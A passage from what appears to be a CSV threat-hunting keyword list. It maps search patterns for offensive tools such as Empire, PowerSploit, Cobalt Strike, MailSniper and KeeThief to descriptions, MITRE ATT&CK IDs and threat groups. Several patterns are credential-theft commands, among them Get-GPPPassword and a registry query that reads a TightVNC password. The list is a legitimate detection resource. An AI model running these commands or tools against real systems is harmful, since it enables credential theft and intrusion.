TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Get-DomainUser -TrustedToAuth | select userprincipalname,offensive_tool_keyword,AD exploitation cheat sheet,msds-allowedtodelegateto*,T1595 - T1590 - T1591 - T1213 - T1039 - T1592,N/A,N/A,N/A,Lateral movement,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-DXWebcamVideo.ps1*,offensive_tool_keyword,SharpDXWebcam,Utilizing DirectX and DShowNET assemblies to record video from a host's webcam,T1123 - T1059.001 - T1027.002,TA0009 - TA0005 - TA0040,N/A,N/A,POST Exploitation tools,https://github.com/snovvcrash/SharpDXWebcam,1,1,N/A,8,1,68,10,2023-07-19T21:09:00Z,2023-07-12T03:26:24Z -*getent passwd | cut -d: -f1*,greyware_tool_keyword,getent,linux commands abused by attackers - find guid and suid sensitives perm,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Credential Access - Defense Evasion - Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*Get-ExchangeAccessToken*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Get-ExoPsAccessToken*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*getExploit.py*,offensive_tool_keyword,getExploit,Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.,T1587 - T1068 - T1211 - T1210 - T1588,TA0006 - TA0002 - TA0009 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Gioyik/getExploit,1,1,N/A,N/A,1,43,27,2015-06-26T16:38:55Z,2015-01-03T03:26:21Z -*getexploitablesystem*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Get-ExploitableSystem*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Get-ExploitableSystem*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-ExploitableUnquotedPath*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Get-FakeServiceUsers*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*Get-FireFoxHistory*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-FoxDump*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-FoxDump*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1151,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*getgppgroups *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-GPPInnerFields*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*getgpppassword *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-GPPPassword -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Get-GPPPassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SiteListPassword.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-GPPPassword*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-GPPPassword.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1124,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-GPPPassword.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Get-HeadersWithPrtCookies*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*GetHijackableDllName*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*Get-ImageNtHeaders*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1103,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-implantworkingdirectory*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-InactiveDomainAdmins*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*Get-InternetExplorerBookmarks*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-InternetExplorerHistory*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ItemProperty -Path HKLM:\Software\TightVNC\Server -Name *Password* | select -ExpandProperty Password*,offensive_tool_keyword,AD exploitation cheat sheet,TightVNC password (convert to Hex then decrypt with e.g.: https://github.com/frizb/PasswordDecrypts),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name *RunAsPPL*,offensive_tool_keyword,AD exploitation cheat sheet,Sometimes LSASS is configured to run as a protected process (PPL). You can query this with PowerShell as follows.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,POST Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-KeePassConfigTrigger*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*Get-KeePassDatabaseKey*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - 